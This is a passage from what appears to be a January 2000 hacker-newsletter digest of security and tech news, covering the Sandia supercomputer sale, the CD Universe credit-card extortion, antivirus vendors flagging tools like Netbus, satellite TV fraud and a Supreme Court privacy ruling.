citizenship did Sandia officials reclaim the computer. "We found the process used to sell the computer to be seriously flawed," said Gregory Friedman, the Energy Department's inspector general, in a summary of the 24-page report. "If the sale were done today, at a time we're sensitized to espionage, it would be an act of stupidity," responded Pace VanDevender, Sandia's chief spokesman, in a telephone interview. "But at the time, China was a friend, with 'most favored nation' status. And senior U.S. officials were visiting there, normalizing our relationship." Nevertheless, the episode has deeply embarrassed Sandia and compounded concerns about lax security at the national laboratories. News of the sale coincided in the past year with a congressional probe of China's alleged theft of U.S. nuclear secrets as well as criminal charges against Wen Ho Lee, a former physicist at Los Alamos National Laboratory who is accused of mishandling classified data. Sandia officials, while acknowledging some mistakes, insist that national security was never jeopardized by the round-trip journey of the Paragon XPS supercomputer from Sandia to a California warehouse and back again. They note that the machine was sold without its classified parts and would have been expensive and inefficient to operate. They also say the buyer had led them to believe he wanted to refurbish the computer and resell it to an Internet service provider in California. "He showed up in a flatbed truck to move the computer," VanDevender said. "This was consistent with his role as an entrepreneur looking to make a deal. Had he really been tasked by China to purchase the computer, he would have been instructed to handle it differently, since it's fragile and not something you bang around." But other government experts say the Paragon could have been reassembled and made operational again. Citing government and industry experts, the Energy Department report says it "could still be useful in a weapons program." "For the most part, Sandia treated the Paragon as if it were any other piece of excess property," the report says, "when in fact, it was a supercomputer that had been used in the department's nuclear weapons program." Sandia originally purchased the computer for $9.56 million in 1993 and used it to model nuclear weapons accidents and simulate the impact of nuclear shock waves on weapons components, among other functions. After five years, lab officials deemed the Paragon obsolete. By then, Sandia had purchased another supercomputer 15 times more powerful. Lab officials also were concerned about the older computer's reliability and were eager to avoid its estimated $3 million annual maintenance and operating costs. Unable to interest any other U.S. government agencies in the system, Sandia sold it in September 1998 for $31,000 to EHI Group USA in Cupertino, Calif. A principal in the company, Korber Jiang, is a Chinese national, although Sandia officials say they were unaware of that at the time. A senior Energy Department official described EHI as a small business dealing in electronic products and other items and selling mostly to the local community. Last July, Sandia bought the computer back from EHI for $89,000. Lab officials agreed to the higher price to allow Jiang "to preserve face with his joint-venture backers in China" and cover the cost of having stored the computer for 10 months, according to the report. If restored to operation, the report says, the Paragon computer would be one of the 100 fastest in the world, with a capability of 190,000 million theoretical operations per second (MTOPS). At the time of the sale, Commerce Department regulations imposed export constraints on computers exceeding 2,000 MTOPS. Nonetheless, Sandia officials never treated the computer as a potential national security risk. The lab's only risk assessment, the report says, consisted of Sandia's "property administrator" asking an unidentified lab employee in early 1998 whether another supercomputer was a "high-risk" item. "The property administrator was told that the other supercomputer was not high-risk, but was export controlled due to its speed," the report says. "The property administrator said that he applied this information to the Paragon and determined that the Paragon was not a high-risk item." Sandia officials also overlooked the shipment of 34 manuals and guides, which were buried beneath computer cables in boxes sent with the computer. And they neglected to screen 134 unclassified data storage disks. "While there is currently no evidence that the 'unclassified disks' contained classified information relating to Sandia's classified operations of the Paragon," the report says, "Sandia did not know the exact nature of the information contained on the 'unclassified' disks at the time the Paragon was sold. In fact, no one at Sandia attempted to make the determination." Grilled about the sale by a House Armed Services subcommittee last October, C. Paul Robinson, Sandia's director, said that had he known of Jiang's nationality, he would have sought to prevent the sale. But he said civil rights laws limit a seller's ability to refuse to deal with a legitimate U.S. firm on the basis of the citizenship of the firm's officers. He recommended new regulations banning the sale of export-controlled items to U.S. companies run by citizens of adversarial nations. Since recovering the Paragon computer, Sandia officials say, the lab has revised its procedures for disposing of equipment and begun training employees to better identify sensitive sale items. © Copyright 2000 The Washington Post Company @HWA 88.0 Kevin Mitnick Interview 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ryan Kevin Mitnick is scheduled to give and interview to 60 Minutes reporters today. The interview should air on 60 Minutes on or about January 23, 2000. Kevin is scheduled to be released from Lompoc Prison on January 21st, 2000. It is felt that Kevin will discuss what he did, and the government's actions. It is thought that since Kevin no longer has a trial hanging over his heard he will be a little more revealing than in the past. 60 Minutes http://www.cbs.com/now/section/0,1636,3415-311,00.shtml (* Didn't see anything to do with Mitnick in this url? - Ed) @HWA 89.0 Encryption Keys Easily Found On Systems 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime Researchers at nCipher in Cambridge, England have found a way to easily find encryption keys on target systems. The technology centers on this: There is a general assumption that encryption keys will be impossible to find because they are buried in servers crowded with similar strings of code. What the researchers discovered, however, is that encryption keys are more random than other data stored in servers. To find the encryption key, one need only search for abnormally random data. ZD Net http://www.zdnet.com/intweek/stories/news/0,4164,2417628,00.html Encryption Keys Vulnerable, Researchers Warn By Doug Brown, Inter@ctive Week January 5, 2000 5:38 PM ET Researchers at an English company announced Wednesday that they found a way to pluck from Web servers "keys" that provide access to private data stored on servers, such as credit-card numbers. The revelation that hackers can break into servers and steal encryption keys could have repercussions throughout the electronic commerce landscape. Companies have long struggled with ensuring customers' privacy in the face of increasing hacker ingenuity, but encryption keys were generally believed to dwell in a safe haven. "It's a pretty big deal," said Tom Hopcroft, president of the Massachusetts Electronic Commerce Association. "Currently, people feel that their keys for credit-card numbers are pretty safe, because they are on a server with a lot of other data, where they might be hard to find." In light of the discovery that encryption keys are readily open to attack, companies must find ways to prevent their discovery, Hopcroft added. "The loss of consumer confidence could cripple the phenomenal growth of electronic commerce," he said. "A lot of that [growth] is because we don't have a fear of giving out our credit-card numbers over the Internet." Alex Van Someren, president of nCipher in Cambridge, England, said the discovery of a method for retrieving encryption keys revolves around research conducted by his brother Nicko, chief technology officer and co-founder of nCipher, and Adi Shamir of the Weizmann Institute in Israel, co-inventor of the RSA encryption system, the base for much current encryption technology. The researchers published their initial findings at the Financial Cryptography '99 conference in February 1999. The research, Alex Van Someren said, laid a theoretical Now, he said, the researchers have demonstrated a concrete method for finding and stealing encryption keys from servers. The technology centers on this: There is a general assumption that encryption keys will be impossible to find because they are buried in servers crowded with similar strings of code. What the researchers discovered, however, is that encryption keys are more random than other data stored in servers. To find the encryption key, one need only search for abnormally random data. Hopcroft compared the method to classic Cold War tactics. "The United States developed quieter and quieter submarines, but they made them so quiet it was quieter than the ambient noise around them," he said. "So the Soviets could search for quiet spots." The problem could be particularly nettlesome for smaller companies, because many of them run their Web businesses on servers shared by other companies. All a hacker would have to do, Hopcroft said, is set up an account with an Internet service provider hosting a company's Web site, "go into that server and root around looking for the keys of other companies. With [the key] there is no way for me to be distinguished from a legitimate business owner." Van Someren said nCipher decided to go after encryption keys because "we make products that redress these problems." The company offers a hardware solution to the problem of encryption-key security. Van Someren noted that it's possible that others - hackers, in particular - already have discovered the path to the once-hidden encryption keys. "We haven't seen any evidence of real attacks occurring, but if it were to occur, there would not necessarily be any trace left behind that it had occurred," he said. Peter Neumann, a computer security researcher at SRI International in Menlo Park, Calif., said the discovery stands as just one more demonstration of "how flaky our infrastructure is." "Every operating system can be broken into one way or another, and the servers aren't an exception," he added. "We need a great deal more security than we have at the moment as we enter into electronic commerce. And the bottom line is we should be a little bit more cautious about depending upon cryptography as the answer to all of our problems, because it isn't. It's very difficult to embed it properly into a system." Bruce Schneier, a world-renowned cryptography expert and chief technology officer at Counterpane Internet Security in San Jose, echoed Neumann. "Security vulnerabilities are inevitable, because of the complexity of the product, the rush to market, all of these things," he said. "So the vulnerabilities, we see them every week. The only solution is to build security processes that take into account the fallibility of the products." Of the nCipher discovery, he said: "Let's say we fix this one. We're not magically better. We've fixed one little thing." @HWA 90.0 Buffer Overflow: Reform the AV Industry 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Render Man How bad is the AV Industry? Does it need to be reformed? Does scanning for one piece of software because of the intent of the author and not the user make sense? How about scanning for legitimate security tools simply because they have extreme power when used by malicous people? Buffer Overflow http://www.hackernews.com/bufferoverflow/ Reform the A/V Industry! Renderman, 01/13/00 Www.Hackcanada.com RenderMan@Hackcanada.com The year was 1988 and a young graduate student named Robert Morris Jr. released a self replicating program onto the internet to show off various holes in system security. Unfortunately when playing with fire, you can get burned. The Program was supposed to only copy itself to a system once, but due to some errors in calculating the probable infection rate, the program replicated itself multiple times on each host on the network causing ever increasing system loads and eventual system crashes. This was the first internet panic over a "worm", but would not be the last. In future years, the Michaelangelo virus, Win95.CIH, and Melissa to name a few, spread fear rapidly across the net. Anti-Virus company media men following in hot pursuit of each. It used to be easy for the Anti-Virus vendors. Anything that was self replicating and/or caused damage was a virus and must be hunted down and destroyed. It was easy, the enemy all wore the same uniform. Though some were snipers waiting for a specific target and a specific time. Other Viruses were experts at camouflage that could stay undetected for months in the wild before being flushed out, but they were all of the same army. Now it's not so easy. If you look at the anti-virus industry today, they seem to be taking on the jobs of security cure all. As Weld Pond mentioned in his Buffer Overflow article on 12/20/99, "The scanners are scanning for more and more software that does not contain virus or trojan code". This is becoming more epidemic. Who remembers the case of Netbus? In February '99 Netbus released version 2.0 to the public as shareware. They removed many of the stealth features and changed it's functionality so it was no longer a trojan horse but an actual product from an actual company. It even achieved a 5 cow rating on Tucows when released. Well, about a month later, the A/V industry started listing this new version of Netbus as a trojan, this action prompted Tucows to remove Netbus 2.0 even after it gave it's 5 cow approval. Ultraaccess.net, the makers of Netbus, tried to talk to the A/V vendors after it was listed, most would not even return their phone calls. Panda was the only one to respond in any fashion to ultraaccess.net. Data fellows and a few other vendors didn't list it until the big vendors and "customer response" prompted them to add it to their definitions. Ultraaccess.net is not a large company, they have however, hired a lawyer and are trying to get all their legal material together for their next version release sometime in spring next year, but it appears to be an up-hill battle. (Thanks go to Judd Spence at Ultraaccess for providing me with the history of Netbus.) Another example of the A/V vendors logic is L0phtcrack. L0phtcrack was released in 1997 and the latest version in January 1999. It has since become one of the premier tools for NT password auditing. L0phtcrack was recently listed as a trojan by one company then others started adding similar descriptions. A/V vendors follow each other on their latest listings, when one company lists a new piece of code, all the others just copy it, as was mentioned by Weld Pond on NTBugtraq (http://www.ntbugtraq.com/default.asp? pid=36&sid=1&A2=ind9912&L=ntbugtraq&F=&S=&P=5026). So if one company doesn't like your product they can have it added to their definitions and all the other ducks fall into a row and list the same program blindly. These situations sound like classic David vs. Goliath battles of the little developer being quashed by big business. With certain A/V producers also having remote administration products, does this not seem like a major conflict of interest? What is to keep them from listing the competition with muddy descriptions as virii and trojans to scare and annoy the customer into using their product? In talking to various security scanner companies I kept hearing the same situation with Netbus; clients had bought and paid for it, but their A/V package was constantly deleting it. What sane person is going to disable their virus protection so they can run a program? Not a very good plan. This usually has the effect of forcing the person to change remote administration tools to one of the big names or to change A/V packages, but since all the vendors share definitions your going to have the same problem. This can severely hurt small business with products like Netbus if their clients are getting frightened with virus warnings. Yet, equally featured products are never given a second glance. If you feel your software was erroneously listed, there is very little recourse in trying to talk to the companies to have some action taken. The big vendors haven't returned Ultraaccess.net's phone calls and the smaller vendors follow the definitions of the big boys. So even if you successfully remove yourself from one package, one has to go to each vendor and plead your case all over again. The A/V industry seems almost like a monopoly that can do what it wants and list anything with impunity, always falling back on the excuse of "customer demand" (though this is how many programs get on the list in the first place, but it's hard to verify if it's a legitimate response or a conjured up one). It's gotten to the point where the industry can make or break products. With big companies like Symantec and NAI that have interests in other products of their own, I can't believe that they aren't abusing the public trust to leverage their own products in the marketplace. Again, as Weld Pond pointed out in his Buffer Overflow article "Symantec's Norton AntiVirus will scan for the remote control programs, NetBus or BO2K, but not the company's own PC Anywhere. Network Associates' McAfee VirusScan will detect the NT password auditing tool, L0phtCrack, but will not detect the company's own vulnerability auditing tool, Cybercop scanner, or their network sniffers, Sniffer Basic or Sniffer Pro". If this is not using your product to force another, I don't know what is. The A/V industry is very necessary, but has gotten too complex for it to continue in the current state. In the very near future, any product that can be misused to any tiny degree will be listed, and what recourse will companies have to protect themselves from the abuses by the industry? I propose an agency, commission, organization, board, watchdog group or something that all A/V vendors are a part of and follow the decisions of, so you only have to appeal your case to one group to clear your products name. A sort of better business bureau for the industry. Many A/V vendors belong to various Internet Security Bodies but there is no body for Anti-Virus. I also suggest a fourth category, separate from virus, worm or trojan. A category of just programs, that only alerts the user that a program is present that may *possibly* be abused in some fashion. Present the user with the option to find out more information about it or acknowledge that it is supposed to be there and never bug them about it again. Nothing scares a person more than seeing INFECTED! or TROJAN! Applied to something on their computer. A less frightening dialog that gives an advisory that says there is a program on their computer that could be a vulnerability would bring some sanity to this problem. Some companies already have a similar "exclude" feature but not all do and they still throw up scary warnings. For the IT community, the ability to filter definition files not to include programs that are supposed to be there would make their lives easier, rather than having their users freaking out at the Anti-Virus warnings. I still feel it is important that if the A/V vendors insist on detecting anything and everything that may be a malicious tool that they don't play favorites, they should list EVERYTHING, including their own products. Many of us realize the merit of these fringe programs (most of which are free) and use them in place of big named box products but don't want to have to fight with our Anti-Virus packages to use them, and should'nt have to. People are demanding more and stranger things from their computers and sometimes it's necessary to borrow code from the book of virii and trojans to achieve this. The line has blurred between a nasty piece of code and a great product. Sometimes it's only the marketing that makes the difference. Renderman, 01/13/00 Www.Hackcanada.com RenderMan@Hackcanada.com @HWA 91.0 China Registering Businesses to Monitor the Net 01/12/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Corporate Internet users in China's commercial hub of Shanghai have been told by Police to register their connections in a nationwide drive to increase control over the Web. "This is for safety," said an official of the Huangpu district branch of the Public Security Bureau. "In order to inspect the Internet, we must control it." (I don't know whether to laugh or cry) C|Net http://news.cnet.com/news/0-1005-200-1518026.html?tag=st.ne.1002 China registering businesses to monitor Net By Reuters Special to CNET News.com January 7, 2000, 11:10 a.m. PT SHANGHAI--Police in China's commercial hub of Shanghai have told corporate Internet users to register in a nationwide drive to increase control over the Web. The city's Public Security Bureau placed an advertisement in a local newspaper, and at least one district had issued a directive ordering companies using the Internet to register with police by Jan. 30, officials said today. "This is for safety," said an official of the Huangpu district branch of the Public Security Bureau. "In order to inspect the Internet, we must control it." China exercises strict control over the Internet, blocking Web sites it considers politically sensitive or pornographic. Companies that fail to register could face fines of up to 50,000 yuan ($6,000), the official said. The police will charge no registration fee, and individual users are not required to follow suit, the offical added. The directive said registration would "strengthen the protection of safety of computers and information." Companies and other "work units" are being required to complete two forms for police, giving email addresses and naming their Internet service providers, documents showed. Internet use has shown explosive growth in China, with some estimates putting the number of Web surfers at more than 7 million by the end of last year. But the government has been alarmed by dissident groups and the banned spiritual movement Falun Gong using the Internet for communication and disseminating information. Story Copyright © 2000 Reuters Limited. All rights reserved. @HWA 92.0 CD Universe Thief Threatens to Post more CC Numbers 01/12/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Maxus, the thief who stole hundreds of thousands of credit card numbers from CD Universe is threatening to release more of the numbers on a new web site. The FBI is investigating. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2420863,00.html?chkpt=zdnntop Data thief threatens to strike again Computer intruder who tried to extort CD Universe says he'll release more stolen credit card numbers. By Mike Brunker, MSNBC January 11, 2000 3:49 PM PT An e-mail author claiming to be the thief who released as many as 25,000 stolen credit card numbers earlier this month told NBC News he'll soon start distributing more card numbers on a new Web site. "Maxus," aka "Maxim," claims to have stolen 300,000 credit card files from online music retailer CD Universe. The site he set up to hand out stolen card information was shut down over the weekend, but a writer identifying himself as the thief told NBC he'll open up a new site "soon." In a separate note to MSNBC, the same writer hinted part of his motivation was to criticize e-commerce companies that don't do enough to preserve users' privacy. The heist sent shockwaves through the e-commerce world over the weekend. The intruder, who claims to have plundered 300,000 credit card numbers from an Internet music retailer's computers, posted thousands of numbers on a Web page after failing to force the company to pay him $100,000. The FBI is investigating the theft and attempted extortion, and the company, CD Universe, said it was advising customers that their credit card data could have been compromised. Word of the extortion plot surfaced Friday, when the thief contacted a California computer security firm and directed employees to the Web site where he apparently had been posting the credit numbers since Christmas Day. Asked why he thought CD Universe refused to pay him the $100,000, Maxus replied (sic), "They ... prefer money vs. people privacy." He also said he still has access to the CD Universe credit card database and can still glean credit card numbers from the site. Brad Greenspan, chairman of eUniverse, the parent company of CD Universe, said Monday that company officials and an outside security firm it had hired were still attempting to determine how the thief had made off with the financial information. But he said there are reasons to believe that other online retailers also could be vulnerable. Other sites could be vulnerable "The hacker has said that there's a flaw (in the ICVerify software that CD Universe was using to process its transactions) ... in a general sense, not just that he found that flaw in our system," he told MSNBC. Representatives of the software maker, CyberCash of Reston, Va., did not return calls Monday seeking comment. The New York Times reported that the extortionist, a self-described 19-year-old from Russia using the name Maxim, claimed in e-mails that he used some of the credit card numbers to obtain money for himself. On the Web site, which was shut down Saturday, the thief said e-mail and faxes had been sent to the company warning that he would publish the credit card numbers and other information obtained through an unspecified "security hole" in the company's e-commerce software. "Pay me or I publish it," the thief claimed to have warned the Wallingford, Conn.-based company by e-mail and fax. CD Universe and its parent, eUniverse, said they were working with the FBI to track the intruder. Unauthorized purchases detailed The company said it had not received any reports that customers' credit card numbers had been used to make unauthorized purchases. But APBNews.com, an Internet publication focused on crime, said it obtained 32 credit card numbers before the Web site was removed and had verified at least two fraudulent purchases -- one for $1,000 worth of computer equipment and another for $1,250 worth of unspecified goods -- from the more than a dozen victims it was able to reach. One of those charges occurred on Saturday, the day the extortionist's Web site was shut down and two weeks after he posted his first credit card numbers. APBNews also reported that two of the cardholders said the card numbers that were posted on the site were replaced and canceled months ago, indicating the stolen database may have been old. Also, all of the credit cards were due to expire between February and April 2000, it said. Customers contacted Greenspan, the eUniverse chairman, said the company was in the process of contacting its customers and advising them of the theft. "We're working with the credit card companies, and we will be and are in the process of informing our users and giving them the appropriate information so that they can make an informed decision (on whether to cancel the cards)," he said. American Express Co. said Monday that its online fraud guarantee will protect its customers from responsibility for unauthorized online charges. In general, credit card holders are responsible for only up to $50 of any unauthorized charge. And Sean Healy, a spokesman for VISA USA, said that while individual banks have the final say on the matter, in most cases there will be "no consumer liability" as a result of the theft. And while the story received plenty of media attention after the New York Times ran it on the front page Monday, the publisher of a credit card industry newsletter said that the theft was essentially a "nonevent" that would likely not even rate a mention in the next edition. "I've been following the industry for 35 years, and credit card fraud is at a historical low point (between 7 and 8 cents per $100)," said Spencer Nilson, whose Nilson Report is circulated in 80 countries. "There is no system that's ever been invented that doesn't cost more than the fraud costs to prevent it." Elias Levy of SecurityFocus.com, a computer security firm that received e-mail from the "cracker" -- the term preferred by law-abiding computer hackers for those who put their skills to criminal use -- alerting it to the existence of the Web site, said approximately 25,000 of the stolen numbers were posted before the site was shut down. Levy said the intruder claimed to have obtained the database containing the credit card numbers by using a security hole in ICVerify, the credit card processing application. "He was not very clear on what the security problem was," Levy told MSNBC. "He claimed that he was able to use the ICVerify software to take a charge from one account and credit it to a different credit card -- basically doing a money transfer. But this is not the same thing as a hole being used to steal the credit cards in the first place." First numbers posted on Christmas In the e-mail he sent to the Times, the hacker said he sent a fax to the company last month offering to destroy his credit card files in exchange for $100,000. When he was rebuffed, he said, he began posting the numbers on another Web site, called Maxus Credit Card Pipeline, on Christmas Day. The hacker e-mailed the Times the numbers for 198 credit cards as proof of the theft. The newspaper said it determined the numbers were real by contacting the credit card owners, at least one of whom also confirmed that she had used it to shop online at CD Universe. Greenspan said company officials learned on Saturday that the numbers had been posted to the Web site and immediately contacted the FBI, which was able to get the Web site, which was hosted by a Kirkland, Wash., Internet service provider, to remove it. Like many online retailers, CD Universe rode a burgeoning interest in online shopping at Christmas to bust open sales projections for music, movies, videos and games. CD Universe's sales were $9.1 million last year and are projected to rise to $16 million this year. For the Internet as a whole, sales this past holiday season climbed more than 300 percent from the previous year to as much as $12 billion, above early expectations that sales would double. Bob Sullivan contributed to this story. @HWA 93.0 Army Plans on DMZs for Its Networks 01/12/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sarge The Network Security Improvement Program (NSIP) has mandated that all Army bases physically separate public servers from those providing access to private Army intranets. (This should be standard operating procedure, surprised it has taken this long to get done.) Federal Computer Week http://www.fcw.com/fcw/articles/web-dmz-01-12-00.asp Army establishes Infowar "DMZ" BY Bob Brewin 01/12/2000 The Army plans to establish network security demilitarized zones (DMZs) at all its bases worldwide as part of a plan to beef up its cyberdefenses against network intrusions and attacks. The DMZs are planned under the Network Security Improvement Program (NSIP), which was designed by the office of the Army's director of information systems for command, control, communications and computers, which is headed by Lt. Gen. William Campbell. Under NSIP, all Army bases and posts will have to physically separate public servers from those providing access to private Army intranets, according to an Army-wide message. That message defined an information DMZ as "an electronic information area physically or logically separated from [the Army base] into which such systems are placed that have primary interface requirements with systems or users external [to the base]. The purpose of the DMZ is to provide a defined and controlled degree of access to information systems and services." The NSIP message also stated that bases could establish multiple DMZs with varying degrees of security, depending on the amount of access internal Army information systems require to systems on public networks, such as the Internet, with all servers protected against known vulnerabilities associated with operating systems and hosted applications. The message added that the Army eventually intends to establish a "more restrictive Army[-wide] DMZ," but did not provide any further details. @HWA 94.0 CBS Alters On Air Images During News 01/12/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by janoVd CBS News has admitted to using digital technology to alter images broadcast on their news programs The Early Show and 48 Hours. So the technology has only been used to insert large billboards or cover up competitors' advertising. A spokesperson for CBS said that each use the technology is examined for impropriety. (Now we can no longer trust what we see on TV. How long before manufacturing video for news stories is common place?) Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500153276-500188423-500797589-0,00.html CBS News reportedly altering images to include network logos Copyright © 2000 Nando Media Copyright © 2000 Associated Press NEW YORK (January 12, 2000 6:51 a.m. EST http://www.nandotimes.com) - CBS News uses digital technology to project certain images during its shows, including a network advertisement that covered the NBC Jumbotron during its New Year's Eve coverage in Times Square, The New York Times reported Wednesday. The technology, which has become common in sports and entertainment programs, has generally not been used on news shows. However, CBS News is regularly using the technology on its "The Early Show" and "48 Hours" programs, according to CBS news executives cited by the newspaper. It was also used on "The CBS Evening News with Dan Rather" on Dec. 30 and Dec. 31. During the latter broadcast, the image of a billboard ad for CBS News was inserted over a Budweiser ad and the large NBC screen located under the New Year's ball, the Times reported. Eric Shapiro, the director of the "CBS Evening News" and CBS News Special Events, said he might use the technology again on the "Evening News." He said the news division examines each case for impropriety before putting virtual logos on the air. "The technique, I find, works best if you put it someplace where there is intended to be something," he said. Rather knew about the use of the virtual technology during the New Year's Eve broadcast and did not protest the practice, Shapiro said. "But he did not know about it in advance," he added. Among other places, the news show logos have been inserted on the sides of buildings, on the back of a horse-drawn carriage in Central Park and in the fountain outside the Plaza Hotel near the park. "The Early Show" has used the technology almost daily since its Nov. 1 debut, making it appear that a large CBS advertisement is attached to the General Motors building, where the show originates. The use of similar technology sparked controversy in 1994, when ABC journalist Cokie Roberts appeared in front of a picture of Capitol Hill. Wearing a coat but actually in the network's Washington bureau, Roberts was introduced by ABC News anchor Peter Jennings as reporting from the Capitol. Neither network viewers nor Jennings knew that Roberts was actually indoors. Both Roberts and Rick Kaplan, then executive producer of "World News Tonight," were reprimanded, and the network issued an on-air apology. Representatives for NBC, ABC and Fox said their news departments did not use digital technology during news broadcasts. A CNN spokeswoman told the Times she knew of no time the technology had been used by the cable network. @HWA 95.0 Direct TV Service Stolen in Illinois 01/12/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench An Illinois man has been arrested and charged with two counts of computer fraud, a Class 4 felony punishable by up to three years in prison, for allegedly rigging Direct TV satellite receivers. This crime was investigated by the year old Illinois State computer crime unit. (Something tells me that this guy was caught because he was stupid (something blatant like putting an ad in the paper) rather than any remarkable skills displayed by the cyber crime squad.) Lexis-Nexis http://web.lexis-nexis.com/more/cahners-chicago/11407/5369541/3 SECTION: State and regional LENGTH: 478 words HEADLINE: Man charged in satellite signal thefts BYLINE: Joe Mahr DATELINE: SPRINGFIELD BODY: Move over cable companies satellite programming has also become a target of TV channel thieves. This week a Sangamon County man became the first person in the state arrested by the Illinois Attorney General's office for allegedly rigging satellite TV receivers. Larry Anders, 46, of Auburn was charged Friday with two counts of the computer fraud, a Class 4 felony punishable by up to three years in prison. Anders allegedly charged area Direct TV subscribers $100 each to reprogram their receivers to automatically get all of the pay-per-view channels offered by the satellite service. Authorities believe such crime is growing as satellite TV services expand their reach into a market previously dominated by cable TV. Programming fraud is nothing new. For years, cable TV companies have fought viewers who pay for only basic services but used illegally ''descrambled'' receivers to get the premium programs. Now, similar efforts are made with the satellite receivers, which use computer cards to control what channels customers can access. The technically savvy with the right computer equipment can reprogram the cards to allow access to every channel, regardless of the customer's subscription level. ''It's becoming more widespread because of easy access to the software via the Internet,'' Attorney General Jim Ryan said in a prepared statement. It's also part of a broader application of computers in all sorts of crime, ranging from child pornography to credit card fraud. ''With the increase in technology, we're seeing it applied in the criminal arena,'' said Sangamon County assistant state's attorney Steve Weinhoeft. Satellite providers try to improve their security with every new model of receiver, but some people still find ways to reprogram the cards. That has caught the attention of Ryan's computer crimes unit, which was formed last year. ''We are aware that there is a group of people working to decode the new cards that come out, and we're going to be concentrating on that,'' said Ryan's deputy chief of investigations, Chuck Redpath, who also is a Springfield alderman. In Anders' case, he allegedly sold a reprogrammed card to an undercover investigator from the attorney general's office Thursday night. Redpath said he's not sure how many people bought such reprogrammed cards from Anders, but those people could face a charge of theft of services, a Class A misdemeanor punishable by up to a year in jail. And according to Redpath, Direct TV's own fraud investigators plan to double-check the connections of its area subscribers to ensure no one is stealing signals. ''I'm sure this is going to send shock waves to people who have had their satellite dishes altered because if they catch you, you can be prosecuted,'' Redpath said. Joe Mahr can be reached at (217) 782-6882 or mahr(at)sj-r.com. @HWA 96.0 Security Book Released on Net for Free 01/12/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In an effort to provide administrators with high quality and timely online technical content, Windows NT magazine has decide to place their book Internet Security with Windows NT on the internet for free. The book will updated with new content as appropriate. Windows NT Magazine http://www.ntsecurity.net/forums/2cents/news.asp?IDF=200&TB=news Call me dense, but I went to this site eagerly interested in checking out this book and couldn't for the life of me bring it up, perhaps its a Netscape foible or perhaps they just plain fucked up, ya I clicked on the right places, i'll try it with MSIE and let you know .. hang on @HWA 97.0 States Can't Sell Private Info 01/14/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime The Driver's Privacy Law, a 1994 federal law limiting the sale of personal information by states, has been supported by the Supreme Court. The precendent-setting case established that State owned databases are subject to federal regulation as interstate commerce just as any other commodity. Such databases would include personal, identifying information from drivers' licenses and motor vehicle registrations. (This case has implications regarding not only future state run databases but commercial ones as well.) ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2421349,00.html?chkpt=p1bn Wired http://www.wired.com/news/politics/0,1283,33611,00.html Jan 12, 2000 12:01 PM PT Feds allowed to limit sale of State databases In a precendent-setting case, the Supreme Court upheld the Driver's Privacy Law, a 1994 federal law limiting the sale of personal information by states. The Court held that personal, identifying information from drivers' licenses and motor vehicle registrations is a "thing in interstate commerce" that can be regulated by Congress like any other commodity. States had argued that the law violated their sovereign rights, but the Court found, the law regulates State databases as those owned by any other entity. "The Supreme Court recognizes that there is a market in personal information, and it has strongly affirmed Congress' authority to regulate that market to protect privacy," said Jim Dempsey, senior staff counsel for the Center for Democracy and Technology. "If Congress can establish privacy rules to regulate personal information in state government databases, it can surely regulate commercial databases." -- Robert Lemos, ZDNet News -=- Wired; DMV Can't Sell Personal Info by Declan McCullagh 12:55 p.m. 12.Jan.2000 PST Motor vehicle agencies can be restricted from selling the personal information on drivers licenses, the US Supreme Court unanimously ruled Wednesday in a widely anticipated decision. The justices said that a federal law restricting departments of motor vehicles from distributing their data to corporations and direct marketers without permission is constitutional, and overturned an earlier appeals court decision. Congress enacted the Driver's Privacy Protection Act (DPPA) in 1994, but South Carolina attorney general Charlie Condon sued the federal government to overturn the measure. He argued it violated the principles of federalism and separation of powers, essentially saying the matter was best decided by state governments and that the feds should butt out. The Supreme Court strongly disagreed. "The DPPA does not require the States in their sovereign capacity to regulate their own citizens. The DPPA regulates the States as the owners of databases," wrote Chief Justice William Rehnquist in the 18 KB decision. Legal scholars say what makes the case important are not its privacy implications, but how it affects the balance of power between state and federal governments. "This is part of a battle that was started in the New York case about what Congress can and cannot order states to do," said David Post, a professor of law at Temple University law school. "The real issue is whether Congress can pass a regulatory statute and force the state governments to enforce it." In New York v. United States, the Supreme Court in part upheld and nixed a 1985 law that regulated state disposal of low-level radioactive waste. Eugene Volokh, a law professor at UCLA, said the Supreme Court has maintained the status quo. "It's not a surprise that this is a 9-0 case. It's long been understood that the federal government has the power to control commerce, including commerce by states, including the sale of information," says Volokh. "This just reaffirms that. That court clarified something that had been assumed all along." Volokh said the 4th US Court of Appeals, which concluded the DPPA violated constitutional principles of federalism, has been more inclined to side with states' rights than other circuit courts. The DPPA says that state governments may not "knowingly disclose" such private information, but there are many exceptions and loopholes. For instance, "any government agency" can obtain drivers license information. So may researchers, private investigators, insurance companies, or impound yards. Marketers may obtain the data as long as states provide drivers "an opportunity, in a clear and conspicuous manner, to prohibit such uses." Privacy and conservative groups applauded the ruling. "My initial reaction is that I'm surprised it was unanimous, given that Rehnquist is so strong on states' rights. I would have [anticipated] that he would have ruled in favor of the states. But I'm pleasantly surprised that it was unanimous in favor of the DPPA," said Lisa Dean, vice president of the Free Congress Foundation. @HWA 98.0 Mitnick Free Next Friday 01/14/00 